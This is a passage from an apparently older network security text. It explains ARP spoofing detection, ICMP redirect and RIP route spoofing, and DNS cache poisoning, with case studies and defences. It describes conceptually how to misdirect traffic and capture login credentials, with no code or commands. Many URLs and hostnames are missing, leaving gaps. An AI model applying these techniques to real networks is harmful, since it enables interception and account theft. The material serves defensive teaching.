Tricklet, an SNMPv1 management system written in the PERL scripting language,was developed by the same group that developed BTNG. The two systems areintegrated and are a good place to start to put together an ARP spoofing detectionsystem in a network large enough to require SNMP management.

In smaller networks, simply placing monitoring software on a small number of secure hostswith interfaces in promiscuous mode all the time might be the only ARP spoofing detectionyou need. Such monitoring software includes “arpmon” and “netlog” from Ohio StateUniversity. These two programs are part of a larger set of programs to assist system andnetwork administrators. Another program to do this kind of monitoring is ARPWatch, whichis more narrowly focused on the issue of looking for anomalous behavior in the ARP protocol.

■ arpmon is available from It requirestcpdump and PERL.

■ netlog is available from

■ ARPWatch 1.7 is a Unix program for monitoring ARP requests and replies. The mostrecent version can be obtained via anonymous FTP to

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Spoofing the IP Routing SystemOn the Internet, every machine that is active at the network layer takes part in routingdecisions (bridges and repeaters are only active at lower layers). The decentralization of routingis unlike simpler systems that limit end user machines to delivering data to a single point ofentry on the network, isolating the end user machine from the internal complexities of thenetwork. The essential routing decision is “Where should a datagram with a particular IPdestination address be sent?” If the destination address matches the (sub)network address of(one of ) the machine’s interface(s), then the machine routes the datagram directly to thedestination hardware address. Otherwise, the machine selects a router to forward the datagram.Each machine keeps a routing table containing a list of destination (sub)networks and the IPaddress of the router used to forward to that (sub)network. A default router handles destina-tions not specifically listed.

How Routers and Route Spoofing WorkRoute spoofing can take various forms, all of which involve getting Internet machines to sendrouted IP datagrams somewhere other than where they should. Route spoofing misdirects non-locally delivered IP datagrams and is thus somewhat similar to ARP spoofing, which misdirectsdirectly delivered IP datagrams. Like ARP spoofing, route spoofing can result in a denial ofservice attack—datagrams do not go to the machine for which they are intended with theresult that a machine appears to be unable to communicate with the network. With a littlemore sophistication, both ARP spoofing and route spoofing can simply intercept all trafficbetween two pieces of the network. In the process, they can filter through the network traffic,possibly making modifications to it, creating the illusion of a properly working network.

If you start with a single default router and other routers are available on the network, youwould expect that for some destination networks the default router would not be the bestchoice. If the default router is not the best choice, it sends the datagram back over the samenetwork from which the datagram originated to a different router. When a router does so, ituses the Internet Control Message Protocol (ICMP) to send a message to the machine origi-nating the datagram. ICMP includes a variety of types of messages. The type of ICMP messagehere is a redirect message.

A redirect message essentially says “it would be best to send datagrams to a router with IPaddress W.X.Y.Z when the destination network is A.B.C.D rather than using me as yourrouter for that destination.” A machine receiving an ICMP redirect message typically updatesits routing table to avoid making the mistake in the future. Note that the datagram did notbecome lost and does not need to be re-sent because the router sending the ICMP redirect hasalready forwarded the datagram to the appropriate router.

ICMP-Based Route SpoofingIf a machine ignores ICMP redirects, its datagrams are still delivered, just not as efficiently.Turning off ICMP redirect processing is one way of avoiding the simplest of route spoofing

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techniques—sending illegitimate ICMP redirect messages. Many systems simply process ICMPredirect messages without checking for their validity. At the very least, a check hopefully ismade to see that the message coming from an IP address corresponds to a known router.

Note Microsoft Windows 95 and Windows NT keep a list of known routers. The firstrouter on the list is the default router; the next router on the list becomes the defaultrouter in case the first one appears to be down.

Another minimal safeguard is to ensure the ARP caches on the hosts have permanent entriesfor the hardware address of all legitimate routers. This prevents an ARP spoof in which amachine masquerades as one of the routers. Such a masquerade would allow such a machine tointercept virtually all traffic leaving the local network just like the attack described in the nextparagraph.

If a machine sends ICMP redirect messages to another machine in the network it could causethe other machine to have an invalid routing table. At the very least, an invalid routing tablewould constitute a denial of service attack—some or all non-local datagrams would not be ableto reach their destination. A much more serious situation would arise if a machine poses as arouter to intercept IP datagrams to some or all destination networks. In that case, the machinebeing used to launch the attack could be multihomed and deliver the IP datagrams via its othernetwork interface. Otherwise, it could simply forward the datagrams to the legitimate routerover the same network interface on which they arrived (without the usual ICMP redirect topoint back to the legitimate router).

The simplest way to avoid ICMP redirect spoofing is to configure hosts not to process ICMPredirect messages. Doing so may be difficult unless your TCP/IP software is configurable.Some systems require source code modifications to prevent these redirect messages. Many UnixSystem V machines accept a packet filter with no recompilation or relinking of the kernel.

Note ICMPinfo provides specialized monitoring of ICMP packets received by a host.

TAP is an example of a packet filter used for monitoring. It provides an example thathelps you put together your own ICMP packet filter to discard suspicious ICMPredirects.

An alternative is to validate ICMP redirect messages, such as checking that the ICMP redirectis from a router you are currently using. This involves checking the IP address of the source ofthe redirect and verifying that the IP address matches with the hardware address in the ARPcache. The ICMP redirect should contain the header of the IP datagram that was forwarded.The header can be checked for validity but could be forged with the aid of a sniffer. However,such a check may add to your confidence in the validity of the redirect message and may beeasier to do than the other checks because neither the routing table nor the ARP cache needs tobe consulted.

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Understanding Routing ProtocolsAn alternative to relying on ICMP redirect messages is to use a routing protocol to givemachines a better idea of which routers to use for which destination networks. A routingprotocol used on an ordinary host is probably not worth the effort because it will probably takemore work than processing ICMP redirects unless multiple routers are available on thenetwork. Relying on ICMP messages from a default router will not be effective when thedefault router fails (which is why Windows 95 and Windows NT have a list of routers asauxiliaries). Of course, routers need routing protocols to exchange routing information withpeer routers unless you use manually configured routing tables. Routing protocols may also bevulnerable to an attack leading to corrupted routing tables on both routers and ordinary hosts.

Two categorizations of protocols used to describe routing protocols: one categorizationseparates protocols by intended use; the other categorization separates protocols by the kind ofalgorithm used to determine which router to use for a given destination network.

The first categorization separates internal routing protocols and external routing protocols.Internal routing protocols are used between routers that are within the same corporate networkand external routing protocols are used between routers that belong to different companies.

The second categorization separates protocols that require only local information—noinformation except information about directly connected routers—from protocols that requireglobal information, or information about the status of every inter-router link in the entirenetwork.

The external protocols are much more limited in the information they share. The technicalname for a set of networks of a single company is an “autonomous system.” An autonomoussystem consists of one or more networks that may share detailed and complete routinginformation with each other, but do not share complete routing information with otherautonomous systems. External routing protocols are used to communicate routing informationbetween autonomous systems. Within an autonomous system, the routers have informationabout how the networks are divided into subnets and about all routes to other autonomoussystems.

The internal subnet structure of one company’s network almost always should be separate fromanother company’s network. One company may also want to keep its network(s) from carryingdatagrams from another company to third parties. For these reasons, external routing protocolsare designed specifically to limit the knowledge they convey and to limit the degree of trust putin the information they provide. External protocols are typically only used on “border” routersthat connect autonomous systems to each other. At the very least, each site with a networkconnected to the Internet has a single border router that connects the site with an InternetService Provider (ISP).

At times, companies with strategic alliances will have border routers connecting their networksto bypass the ISP for IP datagrams that have their source in one company’s network and their

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destination in the other company’s network. Clearly, you must limit your trust in routinginformation provided from other autonomous regions. Today’s strategic partner may betomorrow’s primary competitor and you have no control over the level of security providedwithin another autonomous region. A security breach in another autonomous network couldturn into a security breach in your own autonomous region by spoofing the internal routingprotocol and then propagating that information using an external routing protocol.

Another category of routing protocols tries to find the best route through the Internet. Onetype of protocol uses the vector-distance approach in which each router advertises somemeasure of “distance” or “cost” of delivering datagrams to each destination network for whichit advertises a route. Vector-distance routing protocols (also called Bellman-Ford protocols)only require that each router be aware of the routers it can deliver to directly.

Another type of routing protocol is the link-state, also called the Shortest Path First (SPF), inwhich each router has a complete picture of the corporate network. In link-state routingprotocols, each router actively tests the status of its direct links to other routers, propagateschange information about the status of such routers to all such routers, and uses an algorithmto compute the best path to all destinations from itself. Such an algorithm is Dijkstra’s shortestpath algorithm from graph theory.

The most commonly used routing protocol is a vector-distance protocol called simply theRouting Information Protocol (RIP). RIP predates IP: it is part of the Xerox NetworkingSystem (XNS), which was a networking protocol in use even before IP. According to some,RIP was introduced to IP by a graduate student at Berkeley who produced the first implemen-tation overnight when he realized the IP would need some form of routing protocol.

RIP works by combining information sent by active participants in the protocol with informa-tion on hand in passive participants. Ordinary hosts participate in the protocol passively bylistening to UDP broadcasts on port 520 to get information from the routing tables for eachrouter on their network. The hosts then merge these tables to determine which router to usefor which destination networks.

Routers participate in protocol actively by broadcasting their entire routing table every 30seconds. Instead of the destination network being associated with a router IP address as in theactual routing table, these broadcasts contain destination networks and their associated hopcount. The hop count is the number of routers between the router making the broadcast andthe destination network. A router that can directly deliver to a given network would advertise ahop count of zero to that network.

A router using exactly one intermediary router to reach a network would advertise a hop countof one to that network. RIP treats a hop count of 16 as an infinite distance indicating aninability to deliver to the given network. Using such a low value eliminates routing loopsquickly, but limits RIP to networks with at most 16 routers between any two hosts.

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Misdirecting IP Datagrams from HostsIf a machine is a passive participant in the RIP protocol—it listens to RIP broadcasts and usesthem to update its routing table—one simple way to route spoof is to broadcast illegitimateroute information via UDP on port 520. On a typical Unix system, port 520 is numbered solow that special privileges are required to access it. However, it is possible for almost anypersonal computer user and anyone with special privileges to use RIP to mount a routespoofing attack on all the passive participants in RIP on a network. A particularly serioussituation arises if routers are passive participants in RIP, using it as an internal routingprotocol. If so, RIP propagates the illegitimate information throughout a company’s portionof the Internet and the damage can be widespread.

A Case Study of a RIP-Based Route SpoofTo illustrate such an attack, assume everyone at the university is well-intentioned and thenetwork seems to be normal. The network as well as the major multiuser systems and manynetwork servers are managed by Central Computing. The university has so many individualsystems, however, that some departments, such as Computer Science, have a separate systemadministration staff. Each departmental system administration staff is responsible for a set ofnetworked hosts and is capable of installing network wiring without the knowledge of CentralComputing. Presumably, the Computer Science staff has enough common sense not to modifythe wiring installed by Central Computing. Occasionally, however, Computer Science chafesat what seem to be unreasonable policies imposed by Central Computing.

As you can imagine, Computer Science came up with the brilliant idea of installing a networkthat does not use the wiring installed and maintained by Centralized Computing. After all,Computer Science will have to pay Central Computing to install a network, so why notcontrol the network after it is installed? Of course, the network installation crew is monthsbehind as it is. Network administration does not seem that hard and does not seem particularlydistinct from system administration, so the Computer Science staff takes the plunge and triesto do it themselves. They are successful and the new network works wonderfully—they areproud of their work.

The problem comes when the Computer Science head points out that it would really be nice ifthe new Computer Science network would communicate with the Central Computingnetwork. The solution is obvious to the Computer Science staff: install a router between theComputer Science network and the Central Computing network. The Computer Science staffcan control the new router and use RIP to advertise connectivity between the Central Com-puting network and the Computer Science network. They spend a few dollars on a newnetwork card for one of their workstations and it becomes a router.

At first, the system works fine. The Central Computing routers recognize the availability ofthe new Computer Science network and forward datagrams in both directions via the newlyinstalled departmental workstation/router. Then, one day, a departmental staff memberdecides to reconfigure the workstation and makes a small mistake. He inadvertently changes the

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IP address of the interface connecting the workstation to the Computer Science network. His errorprevents machines on the Computer Science network from being able to send IP datagrams tothe workstation/router because it no longer responds to their ARP requests. Computer Scienceuse of the Central Computing network is light and network failures on the Central Computingnetwork are common, so no one in Computer Science immediately becomes worried whenthey can no longer communicate.

This mistake, however, causes much more severe problems than anyone could have predicted.The IP address installed on the Computer Science router makes it appear to belong to a subnetof the Central Computing network. This subnet is really in a building on the far side ofcampus with several Central Computing routers in between Computer Science and the routerin building with this Central Computing subnet. The Computer Science workstation/routerbegins advertising, via RIP, its direct connection to this subnet with a zero hop count. Thenearest Central Computing router decides that it can get to this subnet with a hop count ofone via the Computer Science workstation/router instead of using the next Central Computingrouter that says it has a hop count of three to the subnet in question. The next centrallycontrolled router gets a RIP broadcast from the first and decides to begin routing datagramsfor this subnet through the first.

Within minutes, a large portion of the network can’t communicate with the Computer Sciencenetwork or the Central Computing subnet associated with the misconfigured IP address. Thesesubnets, however, are used by the main multiuser computers and the off-campus Internet link.Complaints are registered with Central Computing from both directions: Computer Sciencecomplains its connection to Central Computing is down and the users in the building acrosscampus complain that their link to the multiuser computers and the Internet is down. Initially,the two problems are seen as separate failures because they involve networks in widely sepa-rated buildings. The problem was eventually discovered when the routing tables of the routerswere examined. To solve the problem, Central Computing made a manual entry in the routingtable of the router closest to Computer Science and solved half of the problem. ComputerScience fixed the address on its router and solved the other half.

The poor Computer Science system administrator who mistyped a single digit when workingon the workstation/router is then chastised. Afterward, Central Computing figures out thatsomeone might do such a thing on purpose, compromising the stability and security of thenetwork.

Preventing Route SpoofingTo prevent spoofing in situations like the case study, you have the following two primaryoptions:

■ Stop using RIP passively on routers.

■ Use passive RIP carefully on routers.

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One way to prevent RIP spoofing is to remove Central Computing routers from passiveparticipation in RIP and use some other routing protocol between them. The Central Com-puting routers are still active participants in RIP, broadcasting routing information to hostsevery 30 seconds. Thus, misinformation from rogue RIP broadcasts is not propagated through-out the entire organization’s network. However, individual hosts are still susceptible to attackvia RIP if they are passive participants in RIP.

Actually, the problem is not in RIP itself, but in trusting the source of RIP information. To besecure, the passive participant in RIP must only use RIP information from trustworthy sources.The RIP daemon usually distributed with Unix is routed, which is overly trusting. A replace-ment for the standard RIP daemon is GateD, developed at Carnegie-Mellon University(CMU), This program consults a configuration file when it starts. The configuration file,among other things, specifies the IP address(es) of trustworthy RIP information.

The GateD software is no longer available directly from CMU. GateD updates are nowavailable from the GateD Consortium at Merit Networking, Inc. The most recent version maybe obtained from the World Wide Web at or throughanonymous FTP to in the directory /net-research/gated.

Rather than abandoning passive participation in RIP, you can use GateD or the equivalent onthe routers and hosts. Each router is configured to restrict its sources of trusted RIP informa-tion to trusted routers. Similarly, GateD is used on hosts that passively participate in RIP toprotect them from rogue RIP broadcasts.

Central Computing in the preceding example still needs to decide if it will configure the routerclosest to Computer Science to accept the RIP information sent to it from non-CentralComputing routers. If it does not, the workstation/router can send IP datagrams from the newdepartmental subnet to the router. The router, unless specially configured not to do so, willproceed to forward these datagrams to their destinations. When the destination host is ready tosend a reply, it will not find the Computer Science network in its routing table. The routingtable for the destination host will probably have a default router to use in such a case and sendthe IP datagram containing the reply to it.

The default router will also not have an entry in its routing table for the destination of thereply. If it does not have a default router to use for such a case, it will send an ICMP messageback to the host that was attempting to send back the reply and discard the IP datagramcontaining the reply. If the routers do have default routers to use, the reply may be sentthrough a long sequence of routers until it hits one that does not have a default or the time-to-live field on the IP datagram hits zero and the datagram is discarded. In any case, the reply isdropped by a router, an ICMP message goes to the machine that sent the reply, and no replyreaches the Computer Science network.

If the Computer Science workstation/router is ignored by the central routers, it can still beused. In particular it can exchange data between the Computer Science network and the hostson the Central Computing subnet directly connected to the Computer Science router. The

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only problem is in getting data from subnets beyond the Central Computing controlledrouters.

To give Computer Science access to the rest of the network, Central Computing has severaloptions. First, manual entries for the Computer Science network can be added to the routersclosest to the Computer Science router and continue to ignore RIP broadcasts originating fromit. This is simple, neat, and clean. However, if the central routers are using a link-state routingprotocol rather than RIP to communicate among themselves, a manual entry for the Com-puter Science router may make it appear that the route to the Computer Science network isalways up when, if fact, the route will occasionally be down.

A second option is to have the Central Computing router pay attention to RIP broadcastsfrom the Computer Science router but limit the information extracted from the broadcast.Specifically, the only thing that the central router really needs to know is if the workstation/router has a working route to the Computer Science network. Even if the Central Computingrouters use a link-state protocol among themselves, the router nearest to Computer Science canuse a hybrid approach to manage the oddball workstation/router that is not participating in thelink-state protocol.

A Case Study Involving External RoutingSuppose two companies—Apple and IBM, for example—have a direct network link betweentheir respective research networks. Each of them has a “border” router with a direct connectionto the other border router. Each of them also has border routers connected to several differentInternet Service Providers. An external routing protocol, such as EGP, is used to exchangerouting information between the two border routers. Apple’s border router tells IBM’s borderrouter what internal networks should be reached from which border routers in Apple’sautonomous system. IBM’s border router inserts these routes in its routing table. It then usesan internal routing protocol to distribute this information within IBM’s research network.

Suppose Apple were to use EGP (the External Gateway Protocol—a name that makes it soundlike there is no other alternative), a classic external routing protocol, to advertise a route toanother company’s research network, Intel’s, for example, and IBM normally routed IP trafficthrough an ISP. The IBM routing tables would not have any specific routing information forIntel and would just use the default route to the ISP and let the ISP worry about the deliveryroute. If all goes as it would normally, the IBM router sees a route to Intel through one ofApple’s border routers. It makes a specific entry for Intel’s network in its routing table andspreads the reachability information to other IBM routers via its internal routing protocol.

Now, Apple is getting all of the IP traffic sent from IBM to Intel. If no malice is intended inthis error, the traffic is routed out to one of Apple’s ISPs and on to Intel with only a shortadded delay and extra traffic on the edge of Apple’s internal network. On the other hand, theApple border router could be configured to discard such datagrams and Apple would have

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succeeded in a denial of service attack. The attack would be discovered quickly and would befairly pointless. Alternatively, a sniffer on Apple’s internal network would now be able tointercept traffic from IBM to Intel for industrial espionage purposes.

Clearly, a good implementation of an external routing protocol needs to be a bit suspicious ofthe routing information provided by routers from another organization. A database of networkaddresses and their associated autonomous system numbers such as the one provided byInterNIC would reveal to IBM’s border router that the Intel network has an autonomoussystem number different from the one Apple was claiming it had when making the EGPadvertisem*nt. With millions of networks and thousands of autonomous networks, you merelyneed to store the part of the InterNIC database that specifies which network numbers are validfor the autonomous systems that are valid peers of the border router.

Note EGP is no longer considered state-of-the-art in external routing protocols, but theprinciple remains the same for all external routing protocols.

Spoofing Domain Name System NamesSome systems base trust on IP addresses; other systems base trust on Domain Name System(DNS) names. DNS names are easier to remember and easier for most people to work withthan dotted decimal IP addresses. Just as the IP address to hardware address correspondencemay change over time, the name to address correspondence may change too as differentmachines are used for a different set of tasks. Unfortunately, the use of names involves yetanother layer of software, introducing another point of vulnerability for the security of thesystems.

Understanding Name Resolution for HostsWhen software on a host needs to convert a name to an address it sends an address lookupquery to a DNS name server. When a client connects to a named host, the client needs toconvert the name to an address. The client trusts the DNS system to return the correct addressand trusts the routing system to deliver the data to the correct destination. Because virtually allsystems place trust in name server, all of the special precautions described previously in thischapter to protect trust should be used to protect that trust. For example, if you go back andsee which hosts had permanent ARP cache entries on my Windows 95 machine, one of themwas—the DNS name server used by my machine. The name server is on thesame subnet as my machine, so it would be possible for an ARP spoofer to masquerade as thename server and cause all sorts of mischief by misdirecting datagrams.

Similarly, when a host needs to convert an address to a name it sends a reverse lookup query toa DNS name server. When a server accepts a connection from a prospective client, it candetermine the IP address of the prospective client from the IP datagram header. However, theserver must rely on the DNS system to perform a reverse lookup query to determine the nameof the prospective client. If trust is extended to the client on the basis of the client hostname,

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the server is trusting the DNS system to perform this reverse lookup properly. If a DNS nameserver is coerced into providing false data, the security of the system can become compromised.

Understanding DNS Name ServersThe DNS system is complex. To help you understand its structure, think of the DNS systemas a distributed database consisting of records with three fields: name, address, and record type.The database is distributed; not all of the records are kept in a centralized location, and norecord is kept in only one location. The database is not centralized because it would beimpractical to do so—from a technical standpoint and from an administrative standpoint.Technically, such a centralized setup would place an incredible load on one machine, whichwould have to handle all the name-to-address queries for the entire Internet and create hugeamounts of long-distance network traffic. Administratively, this centralized database setupwould be horribly awkward to change because thousands of network administrators wouldneed to be checked for authenticity and privileges each time one of them makes a change.

Note The four record types of interest in DNS names are as follows:

■ Canonical hostname to address mapping

■ Alias hostname to canonical hostname mapping

■ Domain name to name server name mapping

■ Address to hostname mapping other record types that also exist

The primary purpose of DNS is to break down the authority for a set of names into domains.Each domain is administered independently of each other domain. Each domain can createsubdomains that are only loosely related to the domain and administered independently ofeach other. Each subdomain is responsible for a subset of the names of the whole domain. Inturn, subdomains can create subsubdomains and so on. The term “subdomain” is a relativeterm between a domain and a domain that has control over a piece of the domain.

When a name server receives a query to resolve a name, it may make an authoritative replybased on data it keeps in its own portion of the database, or it may make a non-authoritativereply. Two types of non-local replies are possible: iterative or recursive. If the client asks forrecursive resolution (the more common choice), the name server forwards the request to aname server it thinks is more likely to be authoritative than it is and then relays the reply backto the client along with information indicating where the authoritative answer was found. Ifthe client asks for iterative resolution, the name server simply returns the address of the nameserver it would have forwarded the request to and lets the client query that name serverdirectly.

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Efficiency: Caching and Additional InformationBecause name resolution is so frequent, efficiency is important. When a name server makes anauthoritative response, either to an ordinary client host or another name server, the authorita-tive response includes a “time to live,” which amounts to a claim that the response willcontinue to be valid for a certain amount of time. When a name server receives a reply fromanother name server, it caches the reply for the amount of time specified by the “time to live.”

Some kinds of DNS replies will clearly lead to a follow-up query. For example, if a replyincludes a record specifying the name of a name server for a domain, the client probably willsoon make a query to find the address of that name server. Hence, a DNS reply not only hassections for specifying the question, answer, and authority of the answer, but also has a sectionfor additional information. The name server caches additional information records along withthe answer records so that it can handle the follow-up queries efficiently without further nameserver to name server queries.

How DNS Spoofing Can HappenSuppose a name server somewhere on the Internet has been compromised by a security attackor is being controlled by an intruder. This name server will provide authoritative responses forsome domain and all hosts on the Internet will trust those responses. The authoritativeresponses can direct clients looking up the names of servers to connect to servers under thecontrol of the attacker rather than the legitimate servers. A falsified reverse address lookup canfool servers attempting to determine if the IP address of a prospective client corresponds to thename of an authorized client. Within the DNS system, absolutely nothing can be done aboutsuch a direct attack.

A standard attempt at a defense to a DNS spoofing attack is to cross-check all responses toreverse lookup queries by making a forward lookup query. That is, a server queries the DNSsystem with the IP address of a prospective client via a reverse lookup and receives the DNSname(s) of the prospective client. Then it takes the names and queries the DNS system for theaddress(es) that corresponds to the name. Cross-checking has become a standard techniquewith TCP wrapper systems.

Cross-checking may help if the attacker is clumsy and alters the name server files correspond-ing to reverse lookups, but not those corresponding to forward lookups. Because these tablesare kept in separate files, they may also be kept on separate name servers. If the attacker hascompromised only one of the two name servers, the cross-checking may discover the inconsis-tency. Because of potential abuses of the efficiency mechanisms in DNS, the name server maynot discover the inconsistency.

Another attempt to stifle DNS spoofing is to make iterative rather than recursive resolutionrequests so that checks on consistency and authoritativeness can be made more carefully thanthe name servers themselves do. In particular, when a name server makes a non-authoritativeresponse to an iterative query, it responds with the name of a name server more likely to be

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authoritative than itself. If the name server has been compromised, it may direct the iterativequery to another compromised name server or it may claim authoritativeness when it does nothave authoritativeness for the domain being queried. In such cases, a check on authoritative-ness should, in principle, detect the attack.

A check on authoritativeness requires querying a root-level name server for the address of thename servers that are authoritative for the base domain of the DNS name. One must then askthe name server at that address for the address of the name server that is authoritative for thenext component of the DNS name and so on. Such a procedure is clearly quite time consum-ing and places considerable load on root-level name servers. Also, it does not help if anauthoritative name server has become compromised; it only detects invalid claims to authority.

Note, however, that the plural was used when referring to authoritative name servers. TheDNS standards require that data for each domain be replicated on separate computers with nocommon point of failure, meaning that the name servers with the duplicated data must not beattached to the same network or obtain electrical power from a common source. It seemsunlikely that an attacker would be able to compromise all of the authoritative name servers fora given domain.

For this reason, it might seem that you could poll all authoritative name servers when making aquery to look for a discrepancy. Unfortunately, one name server is typically designated as theprimary authority and the others as secondary authority. The secondary name servers simplymake a copy of the data in the primary on a periodic basis after the serial number on the datafor a domain has changed. If the primary authoritative name server is compromised, all thesecondary authoritative name servers will also contain invalid data after enough time haselapsed. Meanwhile, inconsistencies may simply indicate that the secondary has not copiedlegitimate changes to the data on the primary.

Efficiency Mechanisms: Downfall of DNS SecurityThe truly troubling part of the DNS security problem is that when a name server cachesinvalid data, the invalid data can remain in the cache for a very long time and can misdirectqueries that are unrelated to the query that placed the data in the cache in the first place.

For example, suppose one query places the name of a domain and the name of its name serverin the cache as well as the name of the name server and its address. All later queries for namesin that domain will be referred to the earlier named name server at the earlier specified address.If either of these cached records is invalid, all subsequent queries for this domain will bedirected to the wrong place. The responses to these misdirected queries will also be cached. Acompromised name server may cause errors in the caches of uncompromised name servers thatcause the uncompromised name server to provide invalid data to its clients.

Furthermore, a DNS name server can supply arbitrary information in the additional informa-tion section of a response to any query. Thus, it may provide a perfectly valid response to the

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original query, but arbitrary misinformation provided in the additional information section ofthe response will be cached by a name server that queries it.

Suppose, for example, that a server (not a name server) attempts to check on the name of aprospective client by making a query that forces the DNS system to do a reverse lookup on theaddress to find the DNS name of the prospective client. A compromised name server mightprovide an invalid response, which would seem to make the prospective client legitimate.When the server attempts to cross-check this information, the name server may respond withmisinformation provided as additional information to the reverse query. If the server makes aniterative query instead, it will not cause immediate corruption of its name server’s cache whenthe compromised name server is not directly interacting with the local name server, but anyclient of the local name server may trigger a request that corrupts the cache of the local nameserver.

Case Study: A Passive AttackConsider the case of Frank and Mary, who work at Widgets, Inc. Their company runs a nameserver to support their DNS domain, Their workstations consult this name serverwhen looking up the IP addresses of outside networks. One day, Mary is surfing the Web andfinds a reference to something that looks interesting at a site in the domain. HerWeb browser does a DNS query of the name server that forwards the query to name server. The name server caches the reply from andsupplies the requested IP address information to Mary’s Web browser.

Unfortunately, the name server has been taken over by a malicious collegestudent. When the reply goes back to the name server, additional informationfields are attached. One of these contains the name “,” the DNS name for theWell—an online service provider located in San Francisco. The additional information fieldsays that this name is associated with yet another machine controlled by the malicious collegestudent.

A little while later, Frank decides to telnet to his account on and is greeted withthe usual login information and prompt. When he types in his username and password, thereis a brief pause, he is presented with his usual menus, and continues his work.

What has happened is that when Frank used telnet, it made a DNS query of the widget.comname server. The name server found the entry for in its cache andreturned the IP address of the college student’s machine. Frank’s machine established aconnection with the college student’s machine and it began the classic Trojan horse routine.The student’s machine provided the login prompt and stored up the username and password.It then turned around and used a modified version of telnet to connect to andpassed packets back and forth between it and Frank’s machine at Widgets, Inc. The Trojanhorse created the illusion that Frank was directly connected to the Well and gave the collegestudent the password for Frank’s account on the Well.

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Case Study: An Active AttackThe previous case study is a passive attack exploiting DNS weaknesses—the attacker had towait for someone to stumble into his trap and could not be sure who he would catch. Nowexamine an active attack exploiting this same weakness, and with an attacker who targets aspecific individual. Assume that Frank, Mary, and the malicious college student at PodunkUniversity are involved.

Suppose Frank has set up his account at Widgets, Inc. so that he can use rlogin to connect toit from his account on the Well ( without being required to supply a password.Frank trusts that the folks who run the Well are keeping his account secure (he’s probably right).

The malicious college student sends a mail message to a mail server at Widgets, Inc. addressedto someone at Podunk University. The mail server performs a DNS lookup for compromised name server supplies additional information in its reply that indicates notonly that has the college student’s IP address but also that the reverse is true: thestudent’s IP address corresponds to the name

The student then uses rlogin from his machine to connect to Frank’s account at Widgets, Inc.His machine starts up the rlogin daemon. The rlogin daemon gets the IP address of theincoming connection and performs a reverse query of the name server, looking forthe name that corresponds to the IP address of the college student’s machine. The widget.comname server finds this information in its cache and replies that the IP address corresponds tothe name “” The college student gains access to Frank’s account at Widgets, Inc.The only thing the logging information indicates is that Frank connected from his account onthe Well. The logs on the Well show that Frank was not logged in, however, which would tipFrank off if he ever cross-checked them with his own logs.

rlogin is handy when you want to keep passwords out of sight of sniffers, but itsuffers from the problem outlined here. Do not use rlogin to allow access frommachines that do not have authoritative entries in the local name server database.Otherwise, the DNS name of the accessing machine is checked to determine whetherit can be trusted to authenticate its users. A DNS spoof will subvert this check.

Defenses against DNS SpoofingThe ultimate defense against DNS spoofing is not to use the DNS. However, DNS stylenaming is such a part of the way users and system administrators work that it is unthinkable todo without it. On the other hand, many name-to-IP address mappings will not change and, insome cases, it may make as much sense for a system administrator to configure clients to use anIP address as it would to use a DNS name. Every place an IP address is used in place of a DNSname is one less place the system is vulnerable to DNS spoofing.

Many operating systems simplify the process of reducing use of the DNS by having an API forname-to-address and address-to-name mappings. The API is the same whether DNS is being

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used to implement these mappings or some other standard. Some implementations of the APIwill consult local data that is believed to be faster or more secure than DNS. The DNS isconsulted by these implementations of the API only if the local sources fail to give conclusiveresults.

Even if the API on your system only implements the naming system via one mechanism (inwhich case choosing to use DNS may be unavoidable), it may be possible to change theimplementation and reap widespread benefit immediately. In particular, many modernoperating systems use dynamic linking or shared libraries to reduce the size of executable files.With these systems, replacing the library containing the implementation of the API with animplementation that behaves differently will affect all programs started after the replacement.

Note When using SunOS 4.1 as shipped from Sun, for example, you can choose to havethe gethostbyname() and gethostbyaddr() functions use either the /etc/hosts file orthe NIS system. When I wanted my programs to use the DNS system instead, I hadto get source code to implement those functions using the DNS, compile it, andinclude it in the shared C system library.

One way to limit the spread of invalid cached entries is to use name server software running onmany hosts in your network. If a client on one machine triggers the corruption of the cache onone name server, the use of multiple name servers reduces the likelihood of widespreaddamage. Placing a name server on every timeshared Unix host, for example, will not onlyprovide quick responses to local clients from the cached entries on the name server, but willalso reduce the set of hosts affected by a compromised name server consulted by a set of userson a single timeshared host.

Other hosts can use a different name server that will not have its cache corrupted as long as thename server on the timeshared host does not forward recursive requests to the other nameserver. An active attacker targeting a particular system may make direct queries of any nameserver to trigger the corruption of its cache. The technique outlined here limits damage from apassive attacker waiting for victims to come along. You can also add checks to some nameservers so that they will respond only to select clients rather than an arbitrary client. Placingsuch a limitation on a name server does not make it useful for serving requests to the outsideworld but makes it more secure for internal use.

In the case study of Frank’s and Mary’s Widget company you read about earlier, the collegestudent would not have been so successful in his attack if Frank and Mary had been runningname servers on their own workstations. In the first case study, Mary’s cache would have beencorrupted but it would not have caused problems for Frank. In the second case, the cache forthe name server used by the mail server would have been corrupted, but, again, Frank wouldnot have used the corrupted cache unless his name server consulted with the same one as themail server.

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The use of local name servers on workstations also may reduce total network traffic and aids infault tolerance. If a network-wide name server goes down, it will not create any delays forinformation stored in the local name servers.

You are still at risk of a DNS spoof if local name servers on workstations areconfigured to process queries recursively when they consult the network wide nameserver. You are also at risk if the local name server refers its local clients to querythe network wide name server for names for which the network wide name server isalso non-authoritative. In either case, a corrupted network-wide name server cachewill affect the workstations.

The use of local name servers will limit, not eliminate, risks. Local name servers arealso subject to cache corruption. The reduced risk comes from fewer interactionswith any single cache. You should be sure local name servers only process queriesfrom the local machine to prevent an active attacker from directly contaminatingtheir cache. Hiding the workstations behind a firewall will also help.

You might also modify local name server software to be more selective about the information itcaches. Again, doing so will be of limited value if the erroneous data is coming from the cacheof an unmodified name server being consulted by the local name server. Selective caching bydoing such things as ignoring information in the additional information section of DNSreplies will certainly have an adverse impact on efficiency. Response times will also be length-ened by any cross-checking or authority checking done by the modified name server, butcached authority checks may ease the problem somewhat.

RFC 1788 proposes an alternative to DNS reverse lookups: all machines would respond to anew ICMP message requesting the set of names that correspond to the IP address on which theICMP message was received. These responses can then be cross-checked through forward DNSlookups. Although this proposal aims to increase the security of DNS, it is not clear how itwould have helped in the case study involving Frank and Mary described earlier. Name-basedauthentication is fundamentally insecure when the name is not coming directly from atrustworthy source.

The simplest thing a name server administrator can do to prevent a DNS spoof from corrupt-ing the name server cache is to have the most recent version of the operating system’s DNSname server software. The most common implementation of a DNS name server is BIND(Berkeley Internet Name Daemon) on Unix. Newer versions of BIND incorporate modifica-tions made with a more security conscious attitude than older versions. For the most currentversion, consult the Web at


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Tip For a more detailed treatment of the security weaknesses of the DNS system, see thepaper “Countering Abuses of Name-based Authentication” by Christoph Schuba andEugene Spafford of the COAST security lab at Purdue University. The COASTdepartment supplies useful security-related information and many useful tools.COAST has a site on the World Wide Web at

